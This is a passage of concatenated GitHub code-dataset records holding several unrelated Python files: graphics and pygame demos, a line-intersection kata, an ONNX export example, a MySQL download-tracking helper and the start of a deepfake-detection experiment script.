[\"PWCanvas\"]\r\n\r\nclass PWCanvas(Image):\r\n def round_rectangle(self, pos, r=5, outline=None, fill=None, opacity=1):\r\n o = outline\r\n f = fill\r\n op = int(opacity * 255)\r\n #create alpha mask if needed\r\n if isinstance(fill, PWFill) or (op < 255):\r\n size = (pos[2]-pos[0], pos[3]-pos[1])\r\n alpha_pos = (0,0,size[0],size[1])\r\n alpha = PWCanvas.new(size,'L')\r\n alpha.clear(0)\r\n self._round_rectangle(alpha, alpha_pos, r, fill=(op,op,op))\r\n\r\n if isinstance(fill, PWFill):\r\n #create the gradient and apply the mask\r\n gradient = PWCanvas.new(size)\r\n fill.gradient_fill(gradient)\r\n self.blit(gradient, target=(pos[0],pos[1]), mask=alpha)\r\n else: \r\n #solid color\r\n if op == 255: \r\n #simple round_rectangle solid colored\r\n self._round_rectangle(self, pos, r, outline=o, fill=f)\r\n else: \r\n #use mask to make rectangle transparent\r\n rrect = PWCanvas.new(size)\r\n self._round_rectangle(rrect, alpha_pos, r, fill=f)\r\n self.blit(rrect, target=(pos[0],pos[1]), mask=alpha)\r\n\r\n def _round_rectangle(self, canvas, pos, r=5, outline=None, fill=None):\r\n \"\"\"Draws a rounded rectangle on a PWCanvas using the following parameters:\r\n * canvas = a PWCanvas object or Image object\r\n * r = corner radius\r\n * outline = color of outline\r\n * fill = an RGB tuple or 0xRRGGBB integer\r\n \"\"\"\r\n #Just to make things shorter ;)\r\n o = outline\r\n f = fill\r\n if r > 0:\r\n d = r * 2 #diameter\r\n #corner circles\r\n canvas.ellipse((pos[0], pos[1], pos[0] + d, pos[1] + d), outline=o, fill=f)\r\n canvas.ellipse((pos[2] - d, pos[3] - d, pos[2], pos[3]), outline=o, fill=f)\r\n canvas.ellipse((pos[0], pos[3] - d, pos[0] + d, pos[3]), outline=o, fill=f)\r\n canvas.ellipse((pos[2] - d, pos[1], pos[2], pos[1] + d), outline=o, fill=f)\r\n #border rectangles\r\n canvas.rectangle((pos[0] + r, pos[1], pos[2] - r, pos[1] + r), outline=None, fill=f)\r\n canvas.rectangle((pos[0] + r, pos[3] - r, pos[2] - r, pos[3]), outline=None, fill=f)\r\n canvas.rectangle((pos[0], pos[1] + r, pos[0] + r, pos[3] - r), outline=None, fill=f)\r\n canvas.rectangle((pos[2] - r, pos[1] + r, pos[2], pos[3] - r), outline=None, fill=f)\r\n #body\r\n canvas.rectangle((pos[0] + r, pos[1] + r,pos[2] - r, pos[3] - r), outline=None, fill=f)\r\n #borders\r\n if fill is not None:\r\n canvas.line((pos[0] + r, pos[1], pos[2] - r, pos[1]), outline=o)\r\n canvas.line((pos[0] + r, pos[3], pos[2] - r, pos[3]), outline=o)\r\n canvas.line((pos[0], pos[1] + r, pos[0], pos[3] - r), outline=o)\r\n canvas.line((pos[2], pos[1] + r, pos[2], pos[3] - r), outline=o)\r\n else:\r\n #if r == 0 than the round_rectangle is just a rectangle. Let's make things simple\r\n canvas.rectangle(pos, outline=None, fill=f)\r\n\r\n def new(size, mode='RGB'):\r\n \"\"\" rewrite the static \"new\" method to\r\n return a PWCanvas instead of an Image\"\"\"\r\n if not Image._modemap.has_key(mode):\r\n raise ValueError('invalid mode')\r\n return PWCanvas(_graphics.ImageNew(size,Image._modemap[mode]))\r\n\r\n new = staticmethod(new)","repo_name":"SymbiSoft/pys60widgets","sub_path":"src/pwcanvas.py","file_name":"pwcanvas.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"32814348223","text":"import math, random, sys\nimport pygame\nfrom pygame.locals import *\n\ndef rot_center(image, angle):\n \"\"\"rotate an image while keeping its center and size\"\"\"\n orig_rect = image.get_rect()\n rot_image = pygame.transform.rotate(image, angle)\n rot_rect = orig_rect.copy()\n rot_rect.center = rot_image.get_rect().center\n rot_image = rot_image.subsurface(rot_rect).copy()\n return rot_image\n\n# define display surface\t\t\t\nW, H = 1080, 600\nHW, HH = W / 2, H / 2\nAREA = W * H\nleg_offset, leg_height, difference = 50, 40, 27\nleg_length = 9.7\n\n# initialise display\npygame.init()\nCLOCK = pygame.time.Clock()\nDS = pygame.display.set_mode((W, H))\npygame.display.set_caption(\"code.Pylet - Pixel Perfect Collision\")\nFPS = 120\n\n# define some colors\nBLACK = (0, 0, 0, 255)\nWHITE = (255, 255, 255, 255)\n\nobstacle = pygame.image.load(\"obstacle-400x399.png\").convert_alpha()\nbackground = pygame.image.load(\"image_resources/blue.jpg\").convert_alpha()\nobstacle_mask = pygame.mask.from_surface(obstacle)\nobstacle_rect = obstacle.get_rect()\nox = HW - obstacle_rect.center[0]\noy = HH - obstacle_rect.center[1]\n\nleg, leg_mask, leg_rect = [],[],[]\nfor i in range(0,6):\n\tleg.append(pygame.image.load(\"image_resources/leg.png\").convert_alpha())\n\tleg_mask.append(pygame.mask.from_surface(leg[i]))\n\tleg_rect.append(leg[i].get_rect())\n\n\nleg.append(pygame.image.load(\"image_resources/body.png\").convert_alpha())\nleg_mask.append(pygame.mask.from_surface(leg[6]))\nleg_rect.append(leg[6].get_rect())\n\nleg.append(pygame.image.load(\"image_resources/body.png\").convert_alpha())\nleg_mask.append(pygame.mask.from_surface(leg[7]))\nleg_rect.append(leg[7].get_rect())\n\nleg.append(pygame.image.load(\"image_resources/head.png\").convert_alpha())\nleg_mask.append(pygame.mask.from_surface(leg[8]))\nleg_rect.append(leg[8].get_rect())\n\nmx, my = 0 , 0\nmovex,movey = 0, 0\nrotate, spin = [0.0,0.0,0.0,0.0,0.0,0.0],[0.0,0.0,0.0,0.0,0.0,0.0]\ntemp = [[0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0]]\ntemp_two = [[0.0, 0.0], [0.0, 0.0]]\n\n# main loop\nwhile True:\n\tfor event in pygame.event.get():\n\t\tif event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):\n\t\t\tpygame.quit()\n\t\t\tsys.exit()\n\t\tif event.type == KEYDOWN:\n\t\t\tif event.key == K_r:\n\t\t\t\tspin[0] += 1.0\n\t\t\tif event.key == K_t:\n\t\t\t\tspin[0] -= 1.0\n\t\t\tif event.key == K_f:\n\t\t\t\tspin[1] += 1.0\n\t\t\tif event.key == K_g:\n\t\t\t\tspin[1] -= 1.0\n\t\t\tif event.key == K_v:\n\t\t\t\tspin[2] += 1.0\n\t\t\tif event.key == K_b:\n\t\t\t\tspin[2] -= 1.0\n\t\t\tif event.key == K_h:\n\t\t\t\tspin[3] += 1.0\n\t\t\tif event.key == K_j:\n\t\t\t\tspin[3] -= 1.0\n\t\t\tif event.key == K_y:\n\t\t\t\tspin[4] += 1.0\n\t\t\tif event.key == K_u:\n\t\t\t\tspin[4] -= 1.0\n\t\t\tif event.key == K_n:\n\t\t\t\tspin[5] += 1.0\n\t\t\tif event.key == K_m:\n\t\t\t\tspin[5] -= 1.0\n\t\t\telif event.key == K_a:\n\t\t\t\tmovex = -1\n\t\t\telif event.key == K_d:\n\t\t\t\tmovex = 1\n\t\t\telif event.key == K_w:\n\t\t\t\tmovey = -1\n\t\t\telif event.key == K_s:\n\t\t\t\tmovey = 1\n\t\tif event.type == KEYUP:\n\t\t\tif event.key == K_r or event.key == K_t:\n\t\t\t\tspin[0] = 0.0\n\t\t\tif event.key == K_f or event.key == K_g:\n\t\t\t\tspin[1] = 0.0\n\t\t\tif event.key == K_v or event.key == K_b:\n\t\t\t\tspin[2] = 0.0\n\t\t\tif event.key == K_h or event.key == K_j:\n\t\t\t\tspin[3] = 0.0\n\t\t\tif event.key == K_y or event.key == K_u:\n\t\t\t\tspin[4] = 0.0\n\t\t\tif event.key == K_n or event.key == K_m:\n\t\t\t\tspin[5] = 0.0\n\t\t\telif event.key == K_a:\n\t\t\t\tmovex = 0\n\t\t\telif event.key == K_d:\n\t\t\t\tmovex = 0\n\t\t\telif event.key == K_w:\n\t\t\t\tmovey = 0\n\t\t\telif event.key == K_s:\n\t\t\t\tmovey = 0\n\n\tfor i in range(0,6):\n\t\trotate[i] += spin[i]\n\t\trotate[i] = rotate[i] % 360\n\t\tif i < 3:\n\t\t\tleg[i] = pygame.image.load(\"image_resources/leg.png\").convert_alpha()\n\t\t\tleg[i] = rot_center(leg[i], rotate[i])\n\t\t\tleg_mask[i] = pygame.mask.from_surface(leg[i])\n\t\t\tleg_rect[i] = leg[i].get_rect()\n\n\tleg[6] = pygame.image.load(\"image_resources/body.png\").convert_alpha()\n\tleg[6] = rot_center(leg[6], rotate[4])\n\tleg_mask[6] = pygame.mask.from_surface(leg[6])\n\tleg_rect[6] = leg[6].get_rect()\n\tleg[7] = pygame.image.load(\"image_resources/body.png\").convert_alpha()\n\tleg[7] = rot_center(leg[7], rotate[3])\n\tleg_mask[7] = pygame.mask.from_surface(leg[7])\n\tleg_rect[7] = leg[7].get_rect()\n\tleg[8] = pygame.image.load(\"image_resources/head.png\").convert_alpha()\n\tleg[8] = rot_center(leg[8], rotate[5])\n\tleg_mask[8] = pygame.mask.from_surface(leg[8])\n\tleg_rect[8] = leg[8].get_rect()\n\n\n\tmx += movex\n\tmy += movey\n\n\tfor i in range(0,3):\n\t\toffset = (int(mx + leg_offset + (i * difference) - ox), int(my + leg_height - oy))\n\t\tresult = obstacle_mask.overlap(leg_mask[i], offset)\n\t\tfor j in range(0,3):\n\t\t\tif i is not j and not result:\n\t\t\t\toffset = (int((mx + leg_offset + (i * difference)) - (mx + leg_offset + (j * difference))), int(0.0))\n\t\t\t\tresult = leg_mask[j].overlap(leg_mask[i], offset)\n\n\t\tif result:\n\t\t\tmx -= movex\n\t\t\tmy -= movey\n\t\t\tif spin[i] is not 0.0:\n\t\t\t\trotate[i] -= spin[i]\n\t\t\t\tleg[i] = pygame.image.load(\"image_resources/leg.png\").convert_alpha()\n\t\t\t\tleg[i] = rot_center(leg[i], rotate[i])\n\t\t\t\tleg_mask[i] = pygame.mask.from_surface(leg[i])\n\t\t\t\tleg_rect[i] = leg[i].get_rect()\n\n\tfor i in range(0, 3):\n\t\ttemp[i][0] = math.sin(rotate[i] / 180 * math.pi) * leg_length\n\t\ttemp[i][1] = -math.cos((180.0 + rotate[i]) / 180 * math.pi) * leg_length\n\tfor i in range(3, 5):\n\t\ttemp[i][0] = math.cos(rotate[i] / 180 * math.pi)\n\t\ttemp[i][1] = math.sin((180.0 + rotate[i]) / 180 * math.pi)\n\t\ttemp_two[i - 3][0] = -math.sin((180.0 + rotate[i]) / 180 * math.pi) * 4\n\t\ttemp_two[i - 3][1] = math.cos(rotate[i] / 180 * math.pi) * 4\n\n\tprint(temp_two[1][0], \" \", temp_two[1][1])\n\n\tDS.blit(background, (int(0), int(0)))\n\tDS.blit(obstacle, (int(ox), int(oy)))\n\tDS.blit(leg[6], (int(mx), int(my)))\n\tDS.blit(leg[7], (int(mx + (temp[4][0] * 39)), int(my + (temp[4][1] * 39))))\n\tDS.blit(leg[8], (int(mx + (temp[4][0] * 39) + (temp[3][0] * 39)), int(my + (temp[4][1] * 39) + (temp[3][1] * 39))))\n\n\tDS.blit(leg[0], (int(mx + 38 + (temp[4][0] * 12) + temp_two[1][0]), int(my + 40 + (temp[4][1] * 12) + temp_two[1][1])))\n\tDS.blit(leg[1], (int(mx + 38 + (temp[4][0] * 39) + temp_two[1][0]), int(my + 40 + (temp[4][1] * 39) + temp_two[1][1])))\n\tDS.blit(leg[2], (int(mx + 38 + (temp[4][0] * 41) + (temp[3][0] * 25) + temp_two[0][0]), int(my + 40 + (temp[4][1] * 41) + (temp[3][1] * 25) + temp_two[0][1])))\n\n\tDS.blit(leg[3], (int(mx + 38 + (temp[4][0] * 12) + (temp[0][0] * 1.15) + temp_two[1][0]), int(my + 40 + (temp[4][1] * 12) + (temp[0][1] * 1.15) + temp_two[1][1])))\n\tDS.blit(leg[4], (int(mx + 38 + (temp[4][0] * 39) + (temp[1][0] * 1.15) + temp_two[1][0]), int(my + 40 + (temp[4][1] * 39) + (temp[1][1] * 1.15) + temp_two[1][1])))\n\tDS.blit(leg[5], (int(mx + 38 + (temp[4][0] * 41) + (temp[3][0] * 25) + (temp[2][0] * 1.15) + temp_two[0][0]), int(my + 40 + (temp[4][1] * 41) + (temp[3][1]) * 25 + (temp[2][1] * 1.15) + temp_two[0][1])))\n\n\tpygame.display.update()\n\tCLOCK.tick(FPS)\n\tDS.fill(BLACK)","repo_name":"solanylander/PRJ-AgentTower","sub_path":"pixelperfect.py","file_name":"pixelperfect.py","file_ext":"py","file_size_in_byte":6804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22819367937","text":"\"\"\"\n03/05/2023\n\nFonte: https://dojopuzzles.com/problems/interseccao-de-segmentos-de-reta/\n\nEnunciado: Intersecção de segmentos de reta\n\nEm geometria, um problema comum é determinar se duas linhas definidas do ponto A ao B e do C ao D respectivamente, se cruzam.\n\nDesenvolva uma classe Linha2D com as seguintes funcionalidades:\n\nUma linha é construída fornecendo-se dois pontos A=(x1,y1) e B=(x2,y2);\nUma linha L1 deve ser capaz de responder a questão \"Eu me cruzo com a linha L2?\".\nEste problema ilustra alguns problemas associados com algoritmos geométricos e com algoritmos de ponto-flutuante/numéricos; o que devemos fazer com problemas de arredondamento?\n\nParticipantes:\n- Everton Matos\n- Álisson S. Holkem\n- João Moreno\n- Gregorio\n- Luiz Carlos\n- Márcio Conrado\n- Fred\n- \n\"\"\"\n\nimport pytest\n\n\ndef ponto(x, y):\n return (x, y)\n\n\ndef linha(ponto_a, ponto_b):\n return [ponto_a, ponto_b]\n\n\ndef interseccao(linha_1, linha_2):\n xdiff = (linha_1[0][0] - linha_1[1][0], linha_2[0][0] - linha_2[1][0])\n ydiff = (linha_1[0][1] - linha_1[1][1], linha_2[0][1] - linha_2[1][1])\n\n def det(a, b):\n return a[0] * b[1] - a[1] * b[0]\n\n div = det(xdiff, ydiff)\n\n if div == 0:\n raise Exception('não há intersecção')\n\n d = (det(*linha_1), det(*linha_2))\n x = det(d, xdiff) / div\n y = det(d, ydiff) / div\n return x, y\n\n\ndef interseccao2(linha_1, linha_2):\n kx, ky = linha_1[0][0], linha_1[1][0]\n lx, ly = linha_2[0][0], linha_2[1][0]\n nx, ny = linha_1[0][1], linha_1[1][1]\n mx, my = linha_2[0][1], linha_2[1][1]\n det = (nx - mx) * (ly - ky) - (ny - my) * (lx - kx)\n print(det)\n\n if (det == 0.0):\n return 0\n # não há intersecção\n\n s = ((nx - mx) * (my - ky) - (ny - my) * (mx - kx)) / det\n # t = ((lx - kx) * (my - ky) - (ly - ky) * (mx - kx)) / det\n\n Pix = kx + (lx - kx) * s\n Piy = ky + (ly - ky) * s\n\n # Pix = mx + (nx - mx) * t\n # Piy = my + (ny - my) * t\n\n return Pix, Piy\n\n\n\"\"\"\n/* k : ponto inicial da reta 1 */\n/* l : ponto final da reta 1 */\n/* m : ponto inicial da reta 2 */\n/* n : ponto final da reta 2 \n\"\"\"\n\n\ndef test_ponto():\n assert ponto(x=6, y=7) == (6, 7)\n\n\ndef test_linha():\n ponto_a = ponto(x=2, y=4)\n ponto_b = ponto(x=4, y=4)\n assert linha(ponto_a, ponto_b) == [(2, 4), (4, 4)]\n\n\ndef test_intercessao():\n ponto_a = ponto(x=6, y=7)\n ponto_b = ponto(x=2, y=3)\n linha_1 = linha(ponto_a, ponto_b)\n\n ponto_c = ponto(x=2, y=4)\n ponto_d = ponto(x=8, y=4)\n linha_2 = linha(ponto_c, ponto_d)\n\n assert interseccao(linha_1, linha_2) == (3, 4)\n\n #assert interseccao2(linha_1, linha_2) == (3, 4)\n\n\nif __name__ == \"__main__\":\n pytest.main(['-svv', __file__])\n\"\"\"\nENTRADA\na = (6,7)\nb = (2,3)\nc = (2,4)\nd = (8,4)\n\nSAIDA: \ne = (3,4)\n\"\"\"\n\"\"\"\n 1 2 3 4 5 6\n-1*\n-2 *\n-3\n-4\n\nhttps://stackoverflow.com/questions/20677795/how-do-i-compute-the-intersection-point-of-two-lines\n\"\"\"\n","repo_name":"HBNetwork/coding-dojo","sub_path":"interseccao_de_segmentos_de_reta.py","file_name":"interseccao_de_segmentos_de_reta.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"20885287589","text":"from etc import ops\nimport sys\n\n\ndef get_config(cfg_file) -> dict:\n \"\"\"\n Get tool configuration\n :param cfg_file: Configuration filename\n :return: config dict\n \"\"\"\n cfg = ops.load_yaml(cfg_file)\n if len(cfg.get('inventory_sources', '')) == 0:\n print(\"No inventory sources detected\")\n sys.exit(1)\n\n return cfg\n","repo_name":"aegiacometti/vlan_sync","sub_path":"etc/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31823849873","text":"import sys\n\ndef find_min(arr):\n if arr is None:\n print('fatal error: input array should not be none', file=sys.stderr)\n return\n\n if not arr:\n return None\n\n min_number = arr[0]\n for num in arr:\n if num < min_number:\n min_number = num\n \n return min_number\n\ndef helper():\n print(\"find_min(arr): it's a function to find out the minimal number in an array\")\n","repo_name":"COSC381-2020Fall/class-project-jpoeana1","sub_path":"pytest/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"20402776850","text":"import torch\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass non_LR(torch.nn.Module):\n def __init__(self):\n super(non_LR, self).__init__()\n self.Dense1 = torch.nn.Linear(1, 32)\n self.Dense2 = torch.nn.Linear(32, 32)\n self.Dense3 = torch.nn.Linear(32, 16)\n self.Dense4 = torch.nn.Linear(16, 1)\n\n def forward(self, x):\n x= self.Dense1(x)\n x= F.relu(self.Dense2(x))\n x= F.relu(self.Dense3(x))\n out= self.Dense4(x)\n return out\n\n\nif __name__==\"__main__\":\n # Create noisy data:\n x_data = np.linspace(-10, 10, num=1000)\n y_data = 0.1*x_data*np.cos(x_data) + 0.1*np.random.normal(size=1000)\n print('Data created successfully')\n\n # data to torch tensors:\n X = torch.from_numpy(x_data.astype(np.float32))\n Y = torch.from_numpy(y_data.astype(np.float32))\n\n X = X.view(X.shape[0], 1)\n Y = Y.view(Y.shape[0], 1)\n\n print(X.shape, Y.shape)\n\n\n #---------------------------------------------------train---------------------------------------------\n #instance du model:\n model=non_LR()\n\n #loss function:\n criterion=torch.nn.MSELoss()\n\n #optimizer:\n optimizer=torch.optim.Adam(model.parameters(),lr=0.01)\n\n # 10 epochs:\n for i in range(1000):\n #predict:\n ypred=model(X)\n\n #loss:\n loss=criterion(ypred, Y)\n\n #back propagation:\n loss.backward()\n\n #optimizer step:\n optimizer.step()\n\n if i%10==0:\n print(\"epoch {} : loss {} \".format(i,loss))\n\n #remettre grad à 0\n optimizer.zero_grad()\n\n\n # Compute the output\n y_predicted = model(X).detach().numpy()\n\n print(y_predicted.shape)\n\n\n \"\"\"\n # Display the result\n plt.style.use('default')\n\n fig = plt.figure(figsize=(12, 4))\n\n ax1 = fig.add_subplot(121)\n ax2 = fig.add_subplot(122)\n\n ax1.scatter(x_data[::1], y_data[::1], s=2)\n ax1.set_title(\"data\")\n ax2.scatter(x_data[::1], y_data[::1], s=2)\n ax2.plot(x_data, y_predicted, 'r', linewidth=4)\n ax2.set_title(\"data predection\")\n\n plt.grid()\n plt.ylim(top=1.2) # adjust the top leaving bottom unchanged\n plt.ylim(bottom=-1.2)\n\n #plt.savefig(\"../../images/non_LR.png\")\n\n plt.show()\n plt.clf()\"\"\"\n\n\n\n\n #-------------------------------------------------------save----------------------------------------\n #save model:\n #traced_script_module = torch.jit.trace(model,X)\n #torch.jit.save(traced_script_module,\"../models/non_LR_model.pt\")\n\n # Set the model to inference mode.\n model.eval()\n\n # Use the exporter from torch to convert to onnx\n # model (that has the weights and net arch)\n # Create some sample input in the shape this model expects\n dummy_input = torch.randn(10, 1, 1)\n\n # It's optional to label the input and output layers\n input_names = [ \"input\" ]\n output_names = [ \"output\" ]\n\n dynamic_axes=({'input' : {0 : 'batch_size'}, # variable length axes\n 'output' : {0 : 'batch_size'}})\n\n torch.onnx.export(\n model,\n dummy_input,\n \"non_LR_model.onnx\",\n verbose=True,\n input_names=input_names,\n output_names=output_names,\n dynamic_axes=dynamic_axes,\n )\n\n import onnxruntime\n import torch\n import torchvision.models as models\n import numpy as np\n\n ort_session = onnxruntime.InferenceSession(\"non_LR_model.onnx\")\n\n def to_numpy(tensor):\n return tensor.detach().cpu().numpy() if tensor.requires_grad else tensor.cpu().numpy()\n\n\n x = torch.randn(40, 1, 1)\n # compute ONNX Runtime output prediction\n ort_inputs = {ort_session.get_inputs()[0].name: to_numpy(x)}\n ort_outs = ort_session.run(None, ort_inputs)\n print(\"predicted output: \",ort_outs )\n\n\n","repo_name":"gratienj/dl_serialization","sub_path":"onnx/python/simplenets/non_LR.py","file_name":"non_LR.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24843159846","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nfilename: sql_module.py\n\nCreated on Sun Sep 22 23:24:39 2019\n\n@author: qjfoidnh\n\"\"\"\n\nimport pymysql\nfrom pymysql.err import IntegrityError\n\n\nclass MySQLconn_url(object):\n def __init__(self):\n\n self.conn = pymysql.connect(\n host='127.0.0.1',\n port=3307,\n user='root',\n password='bingo',\n database='comics_local',\n )\n self.conn.autocommit(True) # 开启自动提交,生产环境不建议数据库DBA这样做\n self.cursor = self.conn.cursor(cursor=pymysql.cursors.DictCursor)\n # 让MySQL以字典形式返回数据\n\n def __del__(self):\n\n self.conn.close()\n\n # 功能:取指定状态的一条数据\n def fetchoneurl(self, mode=\"pending\", tabname='comic_urls'):\n\n sql = \"SELECT * FROM %s \\\n WHERE status = '%s'\" % (tabname, mode)\n self.conn.ping(True) # mysql长连接防止timeut自动断开\n try:\n self.cursor.execute(sql)\n except Exception as e:\n return e\n else:\n item = self.cursor.fetchone()\n if not item:\n return None\n if mode == \"pending\" or mode == 'aria2':\n if item['checktimes'] < 3:\n sql = \"UPDATE %s SET starttime = now(), status = 'ongoing' WHERE id = %d\" % (tabname, item['id'])\n #print()\n else:\n sql = \"UPDATE %s SET status = 'error' \\\n WHERE id = %d\" % (tabname, item['id'])\n if mode == 'aria2':\n sql = \"UPDATE %s SET status = 'pending', checktimes = 0, raw_address=CONCAT('chmode',raw_address) \\\n WHERE id = %d\" % (tabname, item['id'])\n self.cursor.execute(sql)\n return 'toomany'\n elif mode == \"except\":\n sql = \"UPDATE %s SET status = 'ongoing' \\\n WHERE id = %d\" % (tabname, item['id'])\n try:\n self.cursor.execute(sql)\n except Exception as e:\n self.conn.rollback()\n return e\n else:\n return item\n\n # 功能:更新指定id条目的状态字段\n def updateurl(self, itemid, status='finished', tabname='comic_urls'):\n sql = \"UPDATE %s SET endtime = now(),status = '%s' WHERE id = %d\" % (tabname, status, itemid)\n self.conn.ping(True)\n try:\n self.cursor.execute(sql)\n except Exception as e:\n self.conn.rollback()\n return e\n else:\n return itemid\n\n # 功能:更新指定id条目状态及重试次数字段\n def reseturl(self, itemid, mode, count=0, tabname='comic_urls'):\n\n sql = \"UPDATE %s SET status = '%s', checktimes=checktimes+%d WHERE id = %d\" % (tabname, mode, count, itemid)\n self.conn.ping(True)\n try:\n self.cursor.execute(sql)\n except Exception as e:\n print(e)\n self.conn.rollback()\n return e\n else:\n return itemid\n\n # 功能:将未下载完成图片的网址列表写入数据库,\n def fixunfinish(self, itemid, img_urls, filepaths, tabname='comic_urls'):\n\n img_urls = \"Š\".join(img_urls) # 用不常见拉丁字母做分隔符,避免真实地址中有分隔符导致错误分割\n filepaths = \"Š\".join(filepaths)\n sql = \"UPDATE %s SET failed_links = '%s', failed_paths = '%s', status='except' WHERE id = %d\" % (\n tabname, img_urls, filepaths, itemid)\n self.conn.ping(True)\n try:\n self.cursor.execute(sql)\n except Exception as e:\n self.conn.rollback()\n return e\n else:\n return 0\n\n # 功能:在尝试完一次未完成补全后,更新未完成列表\n def resetunfinish(self, itemid, img_urls, filepaths, tabname='comic_urls'):\n failed_num = len(img_urls)\n if failed_num == 0:\n sql = \"UPDATE %s SET failed_links = null, failed_paths = null, status = 'finished', endtime = now() WHERE id = %d\" % (\n tabname, itemid)\n else:\n img_urls = \"Š\".join(img_urls) # 用拉丁字母做分隔符,避免真实地址中有分隔符导致错误分割\n filepaths = \"Š\".join(filepaths)\n sql = \"UPDATE %s SET failed_links = '%s', failed_paths = '%s', status = 'except' WHERE id = %d\" % (\n tabname, img_urls, filepaths, itemid)\n self.conn.ping(True)\n try:\n self.cursor.execute(sql)\n except Exception as e:\n self.conn.rollback()\n return e\n else:\n return failed_num\n\n # 功能:为条目补上资源名称\n def addcomicname(self, address, title, tabname='comic_urls'):\n sql = \"UPDATE %s SET comic_name = '%s' WHERE raw_address = '%s'\" % (\n tabname, title, address) # 由于调用地点处没有id值,所以这里用address定位。也是本项目中唯二处用address定位的\n self.conn.ping(True)\n try:\n self.cursor.execute(sql)\n except IntegrityError:\n self.conn.rollback()\n sql_sk = \"UPDATE %s SET status = 'skipped' \\\n WHERE raw_address = '%s'\" % (tabname, address)\n self.cursor.execute(sql_sk)\n return Exception(title + \" Already downloaded!\")\n except Exception as e:\n self.conn.rollback()\n return e\n else:\n return 0\n\n # 功能:通过网址查询标识Aria2里对应的gid\n def fetchonegid(self, address, tabname='comic_urls'):\n sql = \"SELECT * FROM %s \\\n WHERE raw_address = '%s'\" % (tabname, address)\n self.conn.ping(True)\n try:\n self.cursor.execute(sql)\n except Exception as e:\n return e\n else:\n item = self.cursor.fetchone()\n if not item:\n return None\n else:\n return item.get('oldpage')\n\n\nmq = MySQLconn_url()\n","repo_name":"bingoHua/SpiderForSukebei","sub_path":"sql_module.py","file_name":"sql_module.py","file_ext":"py","file_size_in_byte":6136,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"38204457100","text":"#\n# Social Video Verification\n# Harman Suri, Eleanor Tursman\n# Brown University, 2020\n#\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport os\nimport numpy as np\nfrom scipy.io import loadmat\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.covariance import MinCovDet\nfrom scipy.cluster.hierarchy import linkage, fcluster\nimport matplotlib.pyplot as plt\n\ndef mahalanobis_calculate(data, num_pcs):\n pca = PCA(num_pcs)\n T = pca.fit_transform(StandardScaler().fit_transform(data))\n # fit a Minimum Covariance Determinant (MCD) robust estimator to data \n robust_cov = MinCovDet().fit(T)\n # Get the Mahalanobis distance\n m = robust_cov.mahalanobis(T)\n return m\n\ndef detectFakesTree(link, thresh):\n ratio = link[-1][-2] / link[-2][-2]\n if ratio > thresh:\n c = fcluster(link, 2,criterion='maxclust')\n partition1 = len(np.argwhere(c==1))\n partition2 = len(np.argwhere(c==2))\n if (partition1 > partition2):\n numFakes = partition2\n else:\n numFakes = partition1\n else:\n numFakes = 0\n c = 0\n return numFakes, c\n\n\ndef onlyPCA(cam1, cam2, cam3, cam4, cam5, cam6, fake2, \n fake3, fake4, start, end, num_pcs, thresh):\n \n cam1Out = mahalanobis_calculate(cam1[start:end,:], num_pcs)\n cam2Out = mahalanobis_calculate(cam2[start:end,:], num_pcs)\n cam3Out = mahalanobis_calculate(cam3[start:end,:], num_pcs)\n cam4Out = mahalanobis_calculate(cam4[start:end,:], num_pcs)\n cam5Out = mahalanobis_calculate(cam5[start:end,:], num_pcs)\n cam6Out = mahalanobis_calculate(cam6[start:end,:], num_pcs)\n \n camFake1 = mahalanobis_calculate(fake2[start:end,:], num_pcs)\n camFake2 = mahalanobis_calculate(fake3[start:end,:], num_pcs)\n camFake3 = mahalanobis_calculate(fake4[start:end,:], num_pcs)\n \n X0 = np.array([cam1Out, cam2Out, cam3Out, cam4Out, cam5Out, cam6Out])\n X1 = np.array([cam1Out, cam2Out, cam3Out, camFake3, cam5Out, cam6Out])\n X2 = np.array([cam1Out, cam2Out, camFake2, camFake3, cam5Out, cam6Out])\n X3 = np.array([cam1Out, camFake1, camFake2, camFake3, cam5Out, cam6Out])\n \n #Test for tracking failures and remove\n badInds = []\n \n for i, row in enumerate(X0.T):\n if np.max(row) >= 10:\n badInds.append(i)\n \n X0 = np.delete(X0, badInds, axis = 1)\n X1 = np.delete(X1, badInds, axis = 1)\n X2 = np.delete(X2, badInds, axis = 1)\n X3 = np.delete(X3, badInds, axis = 1)\n \n link0 = linkage(X0)\n link1 = linkage(X1)\n link2 = linkage(X2)\n link3 = linkage(X3)\n \n numFakes0, _ = detectFakesTree(link0, thresh)\n numFakes1, c1 = detectFakesTree(link1, thresh)\n numFakes2, c2 = detectFakesTree(link2, thresh)\n numFakes3, c3 = detectFakesTree(link3, thresh)\n \n return numFakes0, numFakes1, numFakes2, numFakes3, c1, c2, c3\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='DeepFake Detection Experiment')\n\n parser.add_argument('--data-dir', type=str, default='Data',\n help='Directory where processed landmark files live')\n parser.add_argument('--num_pcs', type=int, default=5,\n help='Number of principal components to use')\n parser.add_argument('--num_participants', type=int, default=1,\n help='Number of participants')\n parser.add_argument('--save-dir', type=str, default='results',\n help='Directory to save results')\n parser.add_argument('--rocOn', action = 'store_false')\n parser.add_argument('--roc-window-size', type=int, default=250, help = \"Window size to use when generating ROC 